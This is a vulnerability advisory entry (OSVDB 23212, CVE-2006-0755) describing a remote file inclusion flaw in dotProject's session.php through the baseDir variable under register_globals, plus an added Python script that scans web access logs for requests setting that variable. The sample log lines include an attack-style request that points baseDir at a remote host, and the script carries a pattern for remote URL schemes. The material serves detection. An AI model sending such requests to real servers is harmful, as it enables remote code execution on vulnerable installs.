dotProject /includes/session.php baseDir Variable Remote File Inclusion

2006-02-14T07:02:38
ID OSVDB:23212
Type osvdb
Reporter Robin Verton (r.verton@gmail.com)
Modified 2006-02-14T07:02:38

Description

Vulnerability Description

dotProject contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /includes/session.php not properly sanitizing user input supplied to the 'baseDir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: set the register_globals PHP option to 'off'.
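A log check for requests that set 'baseDir' on the script named above, added here as an example and not part of the original advisory or of dotProject. It assumes a combined-format web server access log, a constructed /dotproject install prefix, and that any request supplying 'baseDir' to this script is worth reviewing.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client, request target and status from a combined-format access-log line.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# URL schemes that point an include at another host.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)
SCRIPT = "/includes/session.php"   # script named in the advisory
PARAM = "baseDir"                  # PHP variable names are case-sensitive

def classify(line):
    """Return a finding dict for a request that sets baseDir on session.php, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path).lower()
    # Also match PATH_INFO forms such as /includes/session.php/extra
    if not (path.endswith(SCRIPT) or SCRIPT + "/" in path):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # baseDir[]=... also populates the variable under register_globals
        if name.split("[", 1)[0] == PARAM:
            kind = "remote" if REMOTE_RE.match(value) else "override"
            return {"client": m.group("client"), "status": int(m.group("status")),
                    "kind": kind, "value": value}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation address ranges, .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Feb/2006:07:10:01 +0000] "GET /dotproject/includes/session.php'
    '?baseDir=http%3A%2F%2Ffiles.example.invalid%2F HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [14/Feb/2006:07:10:05 +0000] "GET /dotproject/index.php?m=projects HTTP/1.1" 200 9120 "-" "-"',
    '198.51.100.9 - - [14/Feb/2006:07:11:40 +0000] "GET /dotproject/includes/session.php?baseDir=/tmp HTTP/1.0" 200 0 "-" "-"',
    '192.0.2.10 - - [14/Feb/2006:07:12:02 +0000] "GET /dotproject/includes/session.php HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, while register_globals also populates variables from POST bodies and cookies, so an empty result does not rule out an attempt.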

References:

Vendor URL: http://www.dotproject.net/
Secunia Advisory ID: 18879
Related OSVDB IDs: 23210, 23215, 23217, 23214, 23218, 23206, 23211, 23213, 23216, 23219
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0241.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0204.html
FrSIRT Advisory: ADV-2006-0604
CVE-2006-0755
Bugtraq ID: 16648